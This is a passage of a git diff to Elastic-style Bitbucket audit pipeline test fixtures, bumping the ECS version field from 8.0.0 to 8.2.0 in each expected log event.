@@ -6012,7 +6012,7 @@ { "@timestamp": "2021-11-27T17:29:20.128Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6066,7 +6066,7 @@ { "@timestamp": "2021-11-27T17:29:20.127Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6120,7 +6120,7 @@ { "@timestamp": "2021-11-27T17:29:20.119Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6174,7 +6174,7 @@ { "@timestamp": "2021-11-27T17:29:19.922Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6228,7 +6228,7 @@ { "@timestamp": "2021-11-27T17:29:19.913Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6282,7 +6282,7 @@ { "@timestamp": "2021-11-27T17:29:19.896Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6336,7 +6336,7 @@ { "@timestamp": "2021-11-27T17:29:19.622Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6390,7 +6390,7 @@ { "@timestamp": "2021-11-27T17:29:19.613Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6444,7 +6444,7 @@ { "@timestamp": "2021-11-27T17:29:19.602Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6498,7 +6498,7 @@ { "@timestamp": "2021-11-27T17:29:18.850Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6552,7 +6552,7 @@ { "@timestamp": "2021-11-27T17:29:18.849Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6606,7 +6606,7 @@ { "@timestamp": "2021-11-27T17:29:18.770Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6660,7 +6660,7 @@ { "@timestamp": "2021-11-27T17:29:18.764Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -6714,7 +6714,7 @@ { "@timestamp": "2021-11-27T17:29:18.134Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6768,7 +6768,7 @@ { "@timestamp": "2021-11-27T17:29:17.595Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6822,7 +6822,7 @@ { "@timestamp": "2021-11-27T17:29:17.589Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6876,7 +6876,7 @@ { "@timestamp": "2021-11-27T17:29:12.439Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6930,7 +6930,7 @@ { "@timestamp": "2021-11-27T17:29:12.421Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6984,7 +6984,7 @@ { "@timestamp": "2021-11-27T17:29:12.393Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7038,7 +7038,7 @@ { "@timestamp": "2021-11-27T17:29:12.364Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7092,7 +7092,7 @@ { "@timestamp": "2021-11-27T17:29:12.363Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7146,7 +7146,7 @@ { "@timestamp": "2021-11-27T17:29:11.242Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7200,7 +7200,7 @@ { "@timestamp": "2021-11-27T17:29:11.102Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7254,7 +7254,7 @@ { "@timestamp": "2021-11-27T17:29:11.019Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7308,7 +7308,7 @@ { "@timestamp": "2021-11-27T17:29:10.955Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7362,7 +7362,7 @@ { "@timestamp": "2021-11-27T17:29:10.661Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -7416,7 +7416,7 @@ { "@timestamp": "2021-11-27T17:29:10.658Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7470,7 +7470,7 @@ { "@timestamp": "2021-11-27T17:29:10.656Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7524,7 +7524,7 @@ { "@timestamp": "2021-11-27T17:29:10.644Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7578,7 +7578,7 @@ { "@timestamp": "2021-11-27T17:29:10.643Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7632,7 +7632,7 @@ { "@timestamp": "2021-11-27T17:29:10.560Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7686,7 +7686,7 @@ { "@timestamp": "2021-11-27T17:29:09.996Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7740,7 +7740,7 @@ { "@timestamp": "2021-11-27T17:29:09.992Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7794,7 +7794,7 @@ { "@timestamp": "2021-11-27T17:29:09.967Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7848,7 +7848,7 @@ { "@timestamp": "2021-11-27T17:29:09.825Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7902,7 +7902,7 @@ { "@timestamp": "2021-11-27T17:29:09.800Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7956,7 +7956,7 @@ { "@timestamp": "2021-11-27T17:29:09.796Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8010,7 +8010,7 @@ { "@timestamp": "2021-11-27T17:29:09.732Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8064,7 +8064,7 @@ { "@timestamp": "2021-11-27T17:29:09.340Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -8118,7 +8118,7 @@ { "@timestamp": "2021-11-27T17:29:09.068Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8172,7 +8172,7 @@ { "@timestamp": "2021-11-27T17:29:09.008Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8226,7 +8226,7 @@ { "@timestamp": "2021-11-27T17:29:08.877Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8280,7 +8280,7 @@ { "@timestamp": "2021-11-27T17:29:08.836Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8334,7 +8334,7 @@ { "@timestamp": "2021-11-27T17:29:08.642Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8388,7 +8388,7 @@ { "@timestamp": "2021-11-27T17:29:08.597Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8442,7 +8442,7 @@ { "@timestamp": "2021-11-27T17:29:07.438Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8496,7 +8496,7 @@ { "@timestamp": "2021-11-27T17:29:07.326Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8550,7 +8550,7 @@ { "@timestamp": "2021-11-27T17:29:07.312Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8604,7 +8604,7 @@ { "@timestamp": "2021-11-27T17:29:07.281Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8658,7 +8658,7 @@ { "@timestamp": "2021-11-27T17:29:05.974Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8712,7 +8712,7 @@ { "@timestamp": "2021-11-27T17:29:05.973Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8766,7 +8766,7 @@ { "@timestamp": "2021-11-27T17:29:05.941Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -8820,7 +8820,7 @@ { "@timestamp": "2021-11-27T17:29:05.922Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8874,7 +8874,7 @@ { "@timestamp": "2021-11-27T17:29:05.893Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8928,7 +8928,7 @@ { "@timestamp": "2021-11-27T17:29:05.892Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8982,7 +8982,7 @@ { "@timestamp": "2021-11-27T17:29:03.203Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9036,7 +9036,7 @@ { "@timestamp": "2021-11-27T17:29:02.812Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9090,7 +9090,7 @@ { "@timestamp": "2021-11-27T17:29:02.809Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9144,7 +9144,7 @@ { "@timestamp": "2021-11-27T17:29:02.796Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9198,7 +9198,7 @@ { "@timestamp": "2021-11-27T17:29:02.529Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9252,7 +9252,7 @@ { "@timestamp": "2021-11-27T17:29:02.528Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9306,7 +9306,7 @@ { "@timestamp": "2021-11-27T17:29:02.521Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9360,7 +9360,7 @@ { "@timestamp": "2021-11-27T17:29:02.387Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9414,7 +9414,7 @@ { "@timestamp": "2021-11-27T17:29:02.050Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9468,7 +9468,7 @@ { "@timestamp": "2021-11-27T17:29:02.049Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -9522,7 +9522,7 @@ { "@timestamp": "2021-11-27T17:29:02.047Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9576,7 +9576,7 @@ { "@timestamp": "2021-11-27T17:29:02.047Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9630,7 +9630,7 @@ { "@timestamp": "2021-11-27T17:29:02.046Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9684,7 +9684,7 @@ { "@timestamp": "2021-11-27T17:29:02.043Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9738,7 +9738,7 @@ { "@timestamp": "2021-11-27T17:29:00.763Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9792,7 +9792,7 @@ { "@timestamp": "2021-11-27T17:29:00.746Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9846,7 +9846,7 @@ { "@timestamp": "2021-11-27T17:29:00.736Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9900,7 +9900,7 @@ { "@timestamp": "2021-11-27T17:29:00.687Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9954,7 +9954,7 @@ { "@timestamp": "2021-11-27T17:26:26.205Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10009,7 +10009,7 @@ { "@timestamp": "2021-11-27T17:26:25.141Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10070,7 +10070,7 @@ { "@timestamp": "2021-11-27T17:26:25.045Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index 3b9ecd09808..d2bc3605491 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json 
+++ b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-11-27T17:34:25.313Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -98,7 +98,7 @@ { "@timestamp": "2021-11-27T17:34:26.190Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -173,7 +173,7 @@ { "@timestamp": "2021-11-27T17:34:26.108Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -248,7 +248,7 @@ { "@timestamp": "2021-11-27T17:34:26.112Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -311,7 +311,7 @@ { "@timestamp": "2021-11-27T17:35:11.898Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -374,7 +374,7 @@ { "@timestamp": "2021-11-27T17:35:31.362Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -446,7 +446,7 @@ { "@timestamp": "2021-11-27T17:35:33.930Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -518,7 +518,7 @@ { "@timestamp": "2021-11-27T17:35:45.810Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -590,7 +590,7 @@ { "@timestamp": "2021-11-27T17:35:46.331Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -662,7 +662,7 @@ { "@timestamp": "2021-11-27T17:36:17.991Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -727,7 +727,7 @@ { "@timestamp": "2021-11-27T17:36:17.993Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -792,7 +792,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -857,7 +857,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -922,7 +922,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -987,7 +987,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1052,7 +1052,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1117,7 +1117,7 @@ { "@timestamp": "2021-11-27T17:36:18.370Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1181,7 +1181,7 @@ { "@timestamp": "2021-11-27T17:36:18.873Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1253,7 +1253,7 @@ { "@timestamp": "2021-11-27T17:36:19.269Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1325,7 +1325,7 @@ { "@timestamp": "2021-11-27T17:36:40.674Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1401,7 +1401,7 @@ { "@timestamp": "2021-11-27T17:36:40.692Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1496,7 +1496,7 @@ { "@timestamp": "2021-11-27T17:38:04.808Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1571,7 +1571,7 @@ { "@timestamp": "2021-11-27T17:38:16.687Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1666,7 +1666,7 @@ { "@timestamp": "2021-11-27T17:38:23.209Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1761,7 +1761,7 @@ { "@timestamp": "2021-11-27T17:38:29.423Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1836,7 +1836,7 @@ { "@timestamp": "2021-11-27T17:38:42.151Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1913,7 +1913,7 @@ { "@timestamp": "2021-11-27T17:38:53.360Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -2006,7 +2006,7 @@ { "@timestamp": "2021-11-27T17:38:58.870Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2080,7 +2080,7 @@ { "@timestamp": "2021-11-27T17:39:16.414Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2149,7 +2149,7 @@ { "@timestamp": "2021-11-27T17:39:16.499Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2221,7 +2221,7 @@ { "@timestamp": "2021-11-27T17:52:48.728Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2308,7 +2308,7 @@ { "@timestamp": "2021-11-27T17:52:48.751Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2378,7 +2378,7 @@ { "@timestamp": "2021-11-27T17:53:38.996Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2469,7 +2469,7 @@ { "@timestamp": "2021-11-27T17:53:46.125Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2558,7 +2558,7 @@ { "@timestamp": "2021-11-27T17:53:52.180Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2647,7 +2647,7 @@ { "@timestamp": "2021-11-27T17:53:56.893Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2738,7 +2738,7 @@ { "@timestamp": "2021-11-27T17:54:02.547Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2807,7 +2807,7 @@ { "@timestamp": "2021-11-27T17:54:02.652Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2879,7 +2879,7 @@ { "@timestamp": "2021-11-27T17:54:33.144Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2935,7 +2935,7 @@ { "@timestamp": "2021-11-27T17:54:38.580Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -3009,7 +3009,7 @@ { "@timestamp": "2021-11-27T17:54:43.620Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3078,7 +3078,7 @@ { "@timestamp": "2021-11-27T17:54:51.210Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3147,7 +3147,7 @@ { "@timestamp": "2021-11-27T17:54:51.275Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3219,7 +3219,7 @@ { "@timestamp": "2021-11-27T17:57:37.606Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3295,7 +3295,7 @@ { "@timestamp": "2021-11-27T17:58:11.800Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3386,7 +3386,7 @@ { "@timestamp": "2021-11-27T17:59:08.272Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3487,7 +3487,7 @@ { "@timestamp": "2021-11-27T17:59:15.721Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3588,7 +3588,7 @@ { "@timestamp": "2021-11-27T17:59:19.377Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3679,7 +3679,7 @@ { "@timestamp": "2021-11-27T17:59:26.116Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3753,7 +3753,7 @@ { "@timestamp": "2021-11-27T17:59:30.135Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3822,7 +3822,7 @@ { "@timestamp": "2021-11-27T17:59:30.204Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3894,7 +3894,7 @@ { "@timestamp": "2021-11-27T18:00:37.416Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3945,7 +3945,7 @@ { "@timestamp": "2021-11-27T18:01:17.660Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -4010,7 +4010,7 @@ { "@timestamp": "2021-11-27T18:01:17.828Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4097,7 +4097,7 @@ { "@timestamp": "2021-11-27T18:01:17.832Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4167,7 +4167,7 @@ { "@timestamp": "2021-11-27T18:01:18.549Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4257,7 +4257,7 @@ { "@timestamp": "2021-11-27T18:01:35.988Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4327,7 +4327,7 @@ { "@timestamp": "2021-11-27T18:01:41.630Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4402,7 +4402,7 @@ { "@timestamp": "2021-11-27T18:01:41.495Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4477,7 +4477,7 @@ { "@timestamp": "2021-11-27T18:03:20.954Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4552,7 +4552,7 @@ { "@timestamp": "2021-11-27T18:03:41.114Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4627,7 +4627,7 @@ { "@timestamp": "2021-11-27T18:03:41.684Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4707,7 +4707,7 @@ { "@timestamp": "2021-11-27T18:03:41.710Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4787,7 +4787,7 @@ { "@timestamp": "2021-11-27T18:03:42.444Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4862,7 +4862,7 @@ { "@timestamp": "2021-11-27T18:04:07.861Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4954,7 +4954,7 @@ { "@timestamp": "2021-11-27T18:04:08.132Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -5046,7 +5046,7 @@ { "@timestamp": "2021-11-27T18:04:08.133Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5137,7 +5137,7 @@ { "@timestamp": "2021-11-27T18:04:08.141Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5243,7 +5243,7 @@ { "@timestamp": "2021-11-27T18:04:23.970Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5335,7 +5335,7 @@ { "@timestamp": "2021-11-27T18:04:23.975Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5427,7 +5427,7 @@ { "@timestamp": "2021-11-27T18:04:24.600Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5518,7 +5518,7 @@ { "@timestamp": "2021-11-27T18:04:32.296Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5609,7 +5609,7 @@ { "@timestamp": "2021-11-27T18:04:35.945Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5700,7 +5700,7 @@ { "@timestamp": "2021-11-27T18:04:47.255Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5792,7 +5792,7 @@ { "@timestamp": "2021-11-27T18:04:47.288Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5884,7 +5884,7 @@ { "@timestamp": "2021-11-27T18:04:47.298Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5975,7 +5975,7 @@ { "@timestamp": "2021-11-27T18:04:47.298Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6081,7 +6081,7 @@ { "@timestamp": "2021-11-27T18:04:55.112Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6156,7 +6156,7 @@ { "@timestamp": "2021-11-27T18:05:10.261Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -6225,7 +6225,7 @@ { "@timestamp": "2021-11-27T18:05:10.321Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6297,7 +6297,7 @@ { "@timestamp": "2021-11-27T18:10:57.308Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6362,7 +6362,7 @@ { "@timestamp": "2021-11-27T18:10:57.315Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6449,7 +6449,7 @@ { "@timestamp": "2021-11-27T18:10:57.316Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6519,7 +6519,7 @@ { "@timestamp": "2021-11-27T18:10:57.333Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6609,7 +6609,7 @@ { "@timestamp": "2021-11-27T18:11:04.913Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6684,7 +6684,7 @@ { "@timestamp": "2021-11-27T18:11:09.514Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6772,7 +6772,7 @@ { "@timestamp": "2021-11-27T18:11:09.527Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6860,7 +6860,7 @@ { "@timestamp": "2021-11-27T18:11:09.632Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6935,7 +6935,7 @@ { "@timestamp": "2021-11-27T18:11:17.550Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7004,7 +7004,7 @@ { "@timestamp": "2021-11-27T18:11:17.629Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7076,7 +7076,7 @@ { "@timestamp": "2021-11-27T18:12:40.133Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7146,7 +7146,7 @@ { "@timestamp": "2021-11-27T18:12:40.466Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -7226,7 +7226,7 @@ { "@timestamp": "2021-11-27T18:12:44.207Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7295,7 +7295,7 @@ { "@timestamp": "2021-11-27T18:12:44.262Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7367,7 +7367,7 @@ { "@timestamp": "2021-11-27T18:13:19.888Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7437,7 +7437,7 @@ { "@timestamp": "2021-11-27T18:13:19.960Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7507,7 +7507,7 @@ { "@timestamp": "2021-11-27T18:13:24.368Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7576,7 +7576,7 @@ { "@timestamp": "2021-11-27T18:13:24.428Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7648,7 +7648,7 @@ { "@timestamp": "2021-11-27T18:14:14.900Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7718,7 +7718,7 @@ { "@timestamp": "2021-11-27T18:14:14.978Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7806,7 +7806,7 @@ { "@timestamp": "2021-11-27T18:14:18.395Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7875,7 +7875,7 @@ { "@timestamp": "2021-11-27T18:14:18.451Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git 